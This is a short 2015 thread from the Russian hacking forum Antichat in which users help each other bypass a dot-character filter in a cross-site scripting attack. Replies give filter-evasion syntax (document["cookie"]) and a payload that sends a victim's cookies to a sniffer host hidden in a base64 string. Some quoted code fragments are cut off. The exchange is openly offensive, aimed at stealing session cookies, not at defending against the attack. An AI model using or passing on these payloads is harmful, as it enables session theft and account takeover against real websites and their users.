Форум АНТИЧАТ - Фильтрация точки в запросе

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Песочница (https://forum.antichat.xyz/forumdisplay.php?f=189)

- - Фильтрация точки в запросе (https://forum.antichat.xyz/showthread.php?t=432589)

Ditss

05.11.2015 18:00

Здравствуйте все! Можно как-то обойти фильтрацию точки в запросе?

Есть запрос

Код:

/index.php?p=">alert(document.cookie)

Но точка в document.cookie фильтруется... ( Пробовал вставлять ASCII коды точки, но фильтр и на них...

Заранее спасибо!

faza02

05.11.2015 18:25

document["cookie"]

M_script

06.11.2015 08:57

Цитата:

Сообщение от altai

↑
Попробуй вот так

Можете привести пример уязвимого кода, где сработает такая атака?

Altai

06.11.2015 09:51

Цитата:

Сообщение от M_script

↑
Можете привести пример уязвимого кода, где сработает такая атака?

я не внимательно прочитал вопрос Согласен, фигню сказал

Ditss

06.11.2015 12:50

Цитата:

Сообщение от yarbabin

↑
document["cookie"]

Спасибо, так работает! А если нужно сделать так:

Код:

">

как подменять точки в строке адреса?

faza02

06.11.2015 13:12

Цитата:

Сообщение от Ditss

↑
Спасибо, так работает! А если нужно сделать так:

Код:

">

как подменять точки в строке адреса?

(new Image())["src"]=atob("lol")+document["cookie"]

где lol - ссылка на сниффер в base64

M_script

06.11.2015 14:49

Цитата:

Сообщение от Ditss

↑

Код:

">

Этот код не будет работать даже без фильтрации точек.

Время: 11:36